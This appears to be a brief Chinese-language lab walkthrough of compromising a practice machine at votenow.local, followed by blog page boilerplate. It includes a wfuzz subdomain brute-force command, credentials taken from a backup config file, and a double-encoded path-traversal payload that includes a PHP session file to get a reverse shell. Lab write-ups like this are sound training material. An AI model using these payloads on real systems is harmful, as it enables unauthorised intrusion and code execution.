pre靶机

查看靶机mac地址

主机发现

访问ip

目录扫描

端口扫描

获取config.php.bak文件

他的邮箱可能是他的域名

将ip和域名放到hosts文件中

对域名进行目录扫描 还是没有有用的信息

尝试爆破子域名

wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.154.149' -w /home/kali/Desktop/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45

将子域名放到hosts文件

访问子域名

使用之前的config.php.bak账号密码

votebox / casoj3FFASPsbyoRP

进行反弹shell

写入反弹shell语句 vps进行监听

访问 cookie值是文件名

/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_9m1f4b9l84cbomo7krgpk32pfgiutkl1

反弹成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值